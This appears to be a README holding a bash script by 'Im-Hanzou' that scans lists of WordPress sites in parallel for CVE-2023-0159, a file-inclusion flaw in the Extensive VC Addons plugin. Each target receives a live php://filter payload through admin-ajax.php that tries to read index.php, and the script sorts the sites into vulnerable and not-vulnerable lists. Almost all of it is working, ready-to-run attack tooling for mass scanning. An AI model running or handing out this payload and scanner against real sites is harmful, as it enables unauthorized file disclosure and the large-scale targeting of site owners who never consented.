README.md
Rendering markdown...
#!/bin/bash
# CVE-2023-0159 - Extensive VC Addons for WPBakery page builder | Vulnerability Checker
# Created By Im-Hanzou
# Using GNU Parallel
# Usage: bash evcer.sh list.txt thread
yellow='\033[0;33m'
cat << "EOF"
_______ _ _ _______ _______ ______
|______ \ / | |______ |_____/
|______ \/ |_____ |______ | \_
EOF
printf "CVE-2023-0159 Mass Vulnerability Checker\n\n"
printf "${yellow}Created By Im-Hanzou
Github : im-hanzou\n\n"
touch vuln.txt notvuln.txt
exploit(){
classic='\033[0m'
red='\e[41m'
green='\e[42m'
target=$1
thread=$2
if [[ $(curl -s -d 'action=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../index.php' --connect-timeout 10 --max-time 10 --insecure $target'/wp-admin/admin-ajax.php') =~ 'Items are loaded' ]];
then
printf "${green}[ Vuln ]${classic} => [$target] \n";
echo "$target" >> vuln.txt
else
printf "${red}[ Not Vuln ]${classic} => $target \n";
echo "$target" >> notvuln.txt
fi
}
export -f exploit
parallel -j $2 exploit :::: $1
total=$(cat vuln.txt | wc -l)
totalb=$(cat notvuln.txt | wc -l)
printf "\033[0;36mTotal Vuln : $total\n";
printf "\033[0;36mTotal Not Vuln : $totalb\n";